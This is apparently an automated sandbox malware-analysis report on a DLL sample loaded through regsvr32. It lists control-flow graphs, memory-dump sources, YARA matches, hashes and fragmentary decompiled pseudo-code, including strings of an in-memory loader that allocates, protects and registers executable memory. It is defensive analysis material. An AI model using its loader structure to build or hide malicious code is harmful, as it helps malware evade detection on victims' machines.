                                                                                                control_flow_graph 0 ef0000-ef029a call ef091c * 2 13 ef0905 0->13 14 ef02a0-ef02a4 0->14 15 ef0907-ef091a 13->15 14->13 16 ef02aa-ef02ae 14->16 16->13 17 ef02b4-ef02b8 16->17 17->13 18 ef02be-ef02c5 17->18 18->13 19 ef02cb-ef02dc 18->19 19->13 20 ef02e2-ef02eb 19->20 20->13 21 ef02f1-ef02fc 20->21 21->13 22 ef0302-ef0312 21->22 23 ef033f-ef0371 GetNativeSystemInfo 22->23 24 ef0314-ef031a 22->24 23->13 26 ef0377-ef0393 VirtualAlloc 23->26 25 ef031c-ef0324 24->25 27 ef032c-ef032d 25->27 28 ef0326-ef032a 25->28 29 ef03aa-ef03ae 26->29 30 ef0395-ef03a8 VirtualAlloc 26->30 31 ef032f-ef033d 27->31 28->31 32 ef03dc-ef03e3 29->32 33 ef03b0-ef03c2 29->33 30->29 31->23 31->25 34 ef03fb-ef0417 32->34 35 ef03e5-ef03f9 32->35 36 ef03d4-ef03d8 33->36 37 ef0419-ef041a 34->37 38 ef0458-ef0465 34->38 35->34 35->35 39 ef03da 36->39 40 ef03c4-ef03d1 36->40 41 ef041c-ef0422 37->41 42 ef046b-ef0472 38->42 43 ef0537-ef0542 38->43 39->34 40->36 44 ef0448-ef0456 41->44 45 ef0424-ef0446 41->45 42->43 48 ef0478-ef0485 42->48 46 ef0548-ef0559 43->46 47 ef06e6-ef06ed 43->47 44->38 44->41 45->44 45->45 49 ef0562-ef0565 46->49 51 ef07ac-ef07c3 47->51 52 ef06f3-ef0707 47->52 48->43 50 ef048b-ef048f 48->50 53 ef055b-ef055f 49->53 54 ef0567-ef0574 49->54 55 ef051b-ef0525 50->55 58 ef087a-ef088d 51->58 59 ef07c9-ef07cd 51->59 56 ef070d 52->56 57 ef07a9-ef07aa 52->57 53->49 62 ef060d-ef0619 54->62 63 ef057a-ef057d 54->63 60 ef052b-ef0531 55->60 61 ef0494-ef04a8 55->61 64 ef0712-ef0736 56->64 57->51 83 ef088f-ef089a 58->83 84 ef08b3-ef08ba 58->84 65 ef07d0-ef07d3 59->65 60->43 60->50 70 ef04cf-ef04d3 61->70 71 ef04aa-ef04cd 61->71 68 ef061f 62->68 69 ef06e2-ef06e3 62->69 63->62 72 ef0583-ef059b 63->72 87 ef0738-ef073e 64->87 88 ef0796-ef079f 64->88 66 ef085f-ef086d 65->66 67 ef07d9-ef07e9 65->67 66->65 77 ef0873-ef0874 66->77 74 ef080d-ef080f 67->74 75 ef07eb-ef07ed 67->75 76 ef0625-ef0648 68->76 69->47 79 ef04d5-ef04e1 70->79 80 ef04e3-ef04e7 70->80 78 ef0518-ef0519 71->78 72->62 81 ef059d-ef059e 72->81 92 ef0822-ef082b 74->92 93 ef0811-ef0820 74->93 90 ef07ef-ef07f9 75->90 91 ef07fb-ef080b 75->91 110 ef064a-ef064b 76->110 111 ef06b2-ef06b7 76->111 77->58 78->55 96 ef0511-ef0515 79->96 85 ef04fe-ef0502 80->85 86 ef04e9-ef04fc 80->86 97 ef05a0-ef0605 81->97 89 ef08ab-ef08b1 83->89 94 ef08bc-ef08c4 84->94 95 ef08eb-ef0903 84->95 85->78 105 ef0504-ef050e 85->105 86->96 99 ef0748-ef0754 87->99 100 ef0740-ef0746 87->100 88->64 104 ef07a5-ef07a6 88->104 89->84 101 ef089c-ef08a8 89->101 106 ef082e-ef083d 90->106 91->106 92->106 93->106 94->95 103 ef08c6-ef08e9 RtlAddFunctionTable 94->103 95->15 96->78 97->97 98 ef0607 97->98 98->62 108 ef0756-ef0757 99->108 109 ef0764-ef0776 99->109 107 ef077b-ef078d 100->107 101->89 103->95 104->57 105->96 112 ef083f-ef0845 106->112 113 ef084b-ef085c VirtualProtect 106->113 107->88 125 ef078f-ef0794 107->125 116 ef0759-ef0762 108->116 109->107 117 ef064e-ef0651 110->117 118 ef06ce-ef06d8 111->118 119 ef06b9-ef06bd 111->119 112->113 113->66 116->109 116->116 122 ef065b-ef0666 117->122 123 ef0653-ef0659 117->123 118->76 124 ef06de-ef06df 118->124 119->118 120 ef06bf-ef06c3 119->120 120->118 129 ef06c5 120->129 127 ef0668-ef0669 122->127 128 ef0676-ef0688 122->128 126 ef068d-ef06a3 123->126 124->69 125->87 132 ef06ac 126->132 133 ef06a5-ef06aa 126->133 130 ef066b-ef0674 127->130 128->126 129->118 130->128 130->130 132->111 133->117
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334686013.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_ef0000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                • API String ID: 394283112-3605381585
                                                                                                • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                • Instruction ID: 05d8a0d86ab04eb04582b891930be8a17b01b193b271d962b3bd5eb997324429
                                                                                                • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                • Instruction Fuzzy Hash: DA521530618B4C8BCB2DDF18D8856BAB7E1FB94304F14562DE98BD7252DB34E542CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5709C Relevance: 11.5, Strings: 9, Instructions: 237COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                • API String ID: 0-383957222
                                                                                                • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                • Instruction ID: e4ae352508d4b5335efad0b4dc8cadd67607de0b636fb5b177a63cee98df66fc
                                                                                                • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                • Instruction Fuzzy Hash: E3C1CD71519780AFD388DF28C58A91BBBF0FBD4754F906A1DF89686260D7B4D909CF02
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78librarymemorynativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                • API String ID: 2485490239-3005932707
                                                                                                • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F47D6C Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 260 f47d6c-f47d9a 261 f47d9c-f47da4 260->261 262 f4804a-f480a9 call f5a474 261->262 263 f47daa-f47dad 261->263 273 f480b5 262->273 274 f480ab-f480b0 262->274 265 f47ff4-f48045 call f56048 263->265 266 f47db3-f47db9 263->266 265->261 269 f47f53-f47fef call f5fdcc 266->269 270 f47dbf-f47dc5 266->270 269->261 275 f480ba-f480c0 270->275 276 f47dcb-f47ec1 call f5bb78 270->276 273->275 274->261 277 f480c6 275->277 278 f47f40-f47f52 275->278 281 f47ec6-f47ecc 276->281 277->261 282 f47ece-f47ed5 281->282 283 f47edf-f47f3b call f58f30 281->283 282->283 283->278
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                • API String ID: 0-308291206
                                                                                                • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                • Instruction ID: 4e0cdc38288265e2a701971e983b1a1c86ed4ef80fce63a74d3c7228a4fecab7
                                                                                                • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                • Instruction Fuzzy Hash: A5913C7190074A8BDF48DF28C88A4DE3FB1FB58358F65422CEC4AA6290D778D599CBC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5A000 Relevance: 7.7, Strings: 6, Instructions: 154COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 285 f5a000-f5a0cc call f59f38 call f52404 290 f5a0d2-f5a16a call f59424 285->290 291 f5a22c-f5a243 285->291 293 f5a16f-f5a227 call f5c2c0 290->293 293->291
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: /Q$;$F8$KT$F$Z
                                                                                                • API String ID: 0-1951868783
                                                                                                • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                • Instruction ID: 61ae0c8900656f9f40f77758217cd68dd754d73ecee75d9143294b477fe62952
                                                                                                • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                • Instruction Fuzzy Hash: 9C6147B0E147098FCB48CFA8D88A4DEBBB1FB58314F10821DE846A7290D7749995CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 37%
                                                                                                			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t15;
				long long _t19;
				long long _t20;

				_a24 = _t20;
				_a16 = _t15;
				_a8 = _t19;
				_v56 = _a16;
				if (_v56 == 1) goto 0x80010ae6;
				goto 0x80010bf4;
				 *0x80022ca0 = _a8;
				_v52 = 0x904;
				_v48 = 0xf9e;
				_v40 = 0;
				_v32 = 0;
				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
				ExitProcess(??);
			}











                                                                                                0x180010ac0
                                                                                                0x180010ac5
                                                                                                0x180010ac9
                                                                                                0x180010ad6
                                                                                                0x180010adf
                                                                                                0x180010ae1
                                                                                                0x180010aeb
                                                                                                0x180010af2
                                                                                                0x180010afa
                                                                                                0x180010b02
                                                                                                0x180010b0b
                                                                                                0x180010b1b
                                                                                                0x180010b22

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 621844428-0
                                                                                                • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4CC14 Relevance: 4.1, Strings: 3, Instructions: 312COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 309 f4cc14-f4cc36 310 f4cc40 309->310 311 f4cc42-f4cc48 310->311 312 f4cc4e-f4cc54 311->312 313 f4cfbb-f4d136 call f6826c call f41718 311->313 315 f4cfb1-f4cfb6 312->315 316 f4cc5a-f4cc60 312->316 326 f4d13d-f4d314 call f41718 call f61ac4 313->326 327 f4d138 313->327 315->311 318 f4cc66-f4cc73 316->318 319 f4d31f-f4d325 316->319 320 f4cc75-f4ccae 318->320 321 f4ccb0-f4cccb 318->321 319->311 322 f4d32b-f4d338 319->322 325 f4ccd5-f4cf8f call f48870 call f41718 call f61ac4 320->325 321->325 339 f4cf94-f4cf9c 325->339 326->310 337 f4d31a 326->337 327->326 337->319 339->322 340 f4cfa2-f4cfac 339->340
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0c$\$c2&
                                                                                                • API String ID: 0-1001447681
                                                                                                • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                • Instruction ID: 69ef4e2f0c1c1579892a30c935803ea232269405137ffc72474d58023bb36526
                                                                                                • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                • Instruction Fuzzy Hash: 9C02E6715093C88BEBBECF64C889ADA7BADFB44708F10521DEE0A9E258DB745744CB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F48BC8 Relevance: 4.0, Strings: 3, Instructions: 213COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 341 f48bc8-f48c26 call f59f38 344 f48c2b-f48c30 341->344 345 f48c36-f48c3b 344->345 346 f48e8a-f48e9a call f42c08 344->346 347 f48c41-f48c43 345->347 348 f48e7b-f48e85 345->348 356 f48ea6 346->356 357 f48e9c-f48ea1 346->357 350 f48eb8-f48f90 call f5c2c0 347->350 351 f48c49-f48c4e 347->351 348->344 358 f48f95-f48fad 350->358 354 f48c54-f48c59 351->354 355 f48d71-f48e5f call f552c0 351->355 360 f48d10-f48d6a call f58d60 354->360 361 f48c5f-f48c64 354->361 364 f48e64-f48e6b 355->364 362 f48ea8-f48ead 356->362 357->344 367 f48d6f Process32FirstW 360->367 361->362 365 f48c6a-f48cfb call f5bf94 361->365 362->358 366 f48eb3 362->366 364->358 368 f48e71-f48e76 364->368 370 f48d00-f48d0b 365->370 366->344 367->355 368->344 370->344
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .f$M$N5
                                                                                                • API String ID: 0-1477915503
                                                                                                • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                • Instruction ID: fb99541d3e62267ac77c1ff36a94e8f12d462ef6689ef4c6140db4a6f27d9291
                                                                                                • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                • Instruction Fuzzy Hash: 91A16E705197849FD7A8DF28C8C959EBBE0FB84314F905A1DFC869B2A0CB78D945CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F58FC8 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 459 f58fc8-f58ff9 call f59f38 462 f59000 459->462 463 f59005-f5900b 462->463 464 f59354-f593f0 call f5464c 463->464 465 f59011-f59017 463->465 473 f593f5 464->473 467 f59134-f59235 call f5eac0 call f61684 465->467 468 f5901d-f59023 465->468 481 f5923a-f5934f call f487dc 467->481 470 f59029-f5902b 468->470 471 f5912a-f5912f 468->471 474 f59031-f59125 call f549b0 470->474 475 f593fa-f59400 470->475 471->463 473->475 474->462 475->463 477 f59406-f59421 475->477 481->473
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: A]jN
                                                                                                • API String ID: 0-1761522205
                                                                                                • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                • Instruction ID: a56874e6b7e4cd5633a891959add1cf3d06b87349b87e49f9aa22017a58360c4
                                                                                                • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                • Instruction Fuzzy Hash: C0D1E4B1D0460A8FDF48DFA8C48A4AEBBB1FB58304F50462DD516BB290D7786A46CFD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4263C Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C
                                                                                                • API String ID: 0-3705061908
                                                                                                • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                • Instruction ID: cc72b4590bfe3e8a83cb905d31e8116443894c0ff215067d02f5893a5315fa09
                                                                                                • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                • Instruction Fuzzy Hash: 5561D37151C7848BD768DF28C58A40FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 134 18000147c-180001482 135 180001484-180001487 134->135 136 1800014bd-1800014c7 134->136 138 1800014b1-1800014f0 call 180001268 135->138 139 180001489-18000148c 135->139 137 1800015e4-1800015f9 136->137 142 180001608-180001622 call 1800010fc 137->142 143 1800015fb 137->143 157 1800014f6-18000150b call 1800010fc 138->157 158 1800015be 138->158 140 1800014a4 __scrt_dllmain_crt_thread_attach 139->140 141 18000148e-180001491 139->141 149 1800014a9-1800014b0 140->149 145 180001493-18000149c 141->145 146 18000149d-1800014a2 call 1800011ac 141->146 155 180001624-180001659 call 180001224 call 180001e54 call 180001ed0 call 1800013d8 call 1800013fc call 180001254 142->155 156 18000165b-18000168c call 180001c48 142->156 147 1800015fd-180001607 143->147 146->149 155->147 166 18000169d-1800016a3 156->166 167 18000168e-180001694 156->167 169 180001511-180001522 call 18000116c 157->169 170 1800015d6-1800015e3 call 180001c48 157->170 161 1800015c0-1800015d5 158->161 173 1800016a5-1800016af 166->173 174 1800016ea-1800016f2 call 180010ac0 166->174 167->166 172 180001696-180001698 167->172 184 180001573-18000157d call 1800013d8 169->184 185 180001524-180001548 call 180001e94 call 180001e44 call 180001e70 call 180006da0 169->185 170->137 179 18000178b-180001798 172->179 180 1800016b1-1800016b9 173->180 181 1800016bb-1800016c9 173->181 186 1800016f7-180001700 174->186 187 1800016cf-1800016d7 call 18000147c 180->187 181->187 202 180001781-180001789 181->202 184->158 204 18000157f-18000158b call 180001e8c 184->204 185->184 234 18000154a-180001551 __scrt_dllmain_after_initialize_c 185->234 191 180001702-180001704 186->191 192 180001738-18000173a 186->192 196 1800016dc-1800016e4 187->196 191->192 199 180001706-180001728 call 180010ac0 call 1800015e4 191->199 200 180001741-180001756 call 18000147c 192->200 201 18000173c-18000173f 192->201 196->174 196->202 199->192 229 18000172a-18000172f 199->229 200->202 215 180001758-180001762 200->215 201->200 201->202 202->179 223 1800015b1-1800015bc 204->223 224 18000158d-180001597 call 180001340 204->224 220 180001764-18000176b 215->220 221 18000176d-18000177d 215->221 220->202 221->202 223->161 224->223 233 180001599-1800015a7 224->233 229->192 233->223 234->184 235 180001553-180001570 call 180006d5c 234->235 235->184
                                                                                                C-Code - Quality: 100%
                                                                                                			E0000000118000147C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x800014bd;
				if (_t5 == 0) goto 0x800014b1;
				if (_t5 == 0) goto 0x800014a4;
				if (__edx == 1) goto 0x8000149d;
				return 1;
			}




                                                                                                0x180001480
                                                                                                0x180001482
                                                                                                0x180001487
                                                                                                0x18000148c
                                                                                                0x180001491
                                                                                                0x18000149c

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                • String ID:
                                                                                                • API String ID: 190073905-0
                                                                                                • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                                • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00000001800063CC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 71%
                                                                                                			E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t31;
				intOrPtr _t37;
				void* _t50;
				intOrPtr* _t67;
				long long _t73;
				void* _t75;
				long long _t89;
				signed int _t90;
				void* _t91;
				intOrPtr* _t92;
				void* _t95;
				void* _t98;

				_t98 = __r8;
				_t75 = __rcx;
				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx == 0) goto 0x8000653f;
				_t2 = _t75 - 1; // -1
				if (_t2 - 1 <= 0) goto 0x8000640a;
				E000000011800086F4(_t2 - 1, __rax);
				_t3 = _t90 + 0x16; // 0x16
				 *__rax = _t3;
				E000000011800085B8();
				goto 0x8000653f;
				E00000001180009CD8(_t50, __rbx, _t91);
				r8d = 0x104;
				E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
				_t92 =  *0x80022630; // 0xd13350
				 *0x80022610 = 0x80022250;
				if (_t92 == 0) goto 0x8000643e;
				if ( *_t92 != dil) goto 0x80006441;
				_t67 =  &_a32;
				_a24 = _t90;
				_v56 = _t67;
				r8d = 0;
				_a32 = _t90;
				_t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
				r8d = 1;
				E0000000118000636C(_t31, _a24, _a32, _t98); // executed
				_t73 = _t67;
				if (_t67 != 0) goto 0x80006499;
				E000000011800086F4(_t67, _t67);
				 *_t67 = 0xc;
				E0000000118000878C(_t67, _a24);
				goto 0x80006403;
				_v56 =  &_a32;
				E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x800064d1;
				_t37 = _a24 - 1;
				 *0x80022620 = _t73;
				 *0x80022618 = _t37;
				goto 0x8000653a;
				_a16 = _t90;
				0x80009298();
				if (_t37 == 0) goto 0x80006500;
				E0000000118000878C( &_a32, _a16);
				_a16 = _t90;
				E0000000118000878C( &_a32, _t73);
				goto 0x8000653f;
				_t89 = _a16;
				if ( *_t89 == _t90) goto 0x8000651b;
				if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
				 *0x80022618 = 0;
				_a16 = _t90;
				 *0x80022620 = _t89;
				E0000000118000878C(_t89 + 8, _t90 + 1);
				_a16 = _t90;
				E0000000118000878C(_t89 + 8, _t73);
				return _t37;
			}



















                                                                                                0x1800063cc
                                                                                                0x1800063cc
                                                                                                0x1800063cc
                                                                                                0x1800063e1
                                                                                                0x1800063e6
                                                                                                0x1800063ec
                                                                                                0x1800063f2
                                                                                                0x1800063f4
                                                                                                0x1800063f9
                                                                                                0x1800063fc
                                                                                                0x1800063fe
                                                                                                0x180006405
                                                                                                0x18000640a
                                                                                                0x180006416
                                                                                                0x180006421
                                                                                                0x180006426
                                                                                                0x18000642d
                                                                                                0x180006437
                                                                                                0x18000643c
                                                                                                0x180006441
                                                                                                0x180006445
                                                                                                0x18000644d
                                                                                                0x180006452
                                                                                                0x180006455
                                                                                                0x18000645e
                                                                                                0x180006467
                                                                                                0x180006474
                                                                                                0x180006479
                                                                                                0x18000647f
                                                                                                0x180006481
                                                                                                0x18000648d
                                                                                                0x18000648f
                                                                                                0x180006494
                                                                                                0x1800064ab
                                                                                                0x1800064b0
                                                                                                0x1800064b9
                                                                                                0x1800064be
                                                                                                0x1800064c0
                                                                                                0x1800064c7
                                                                                                0x1800064cf
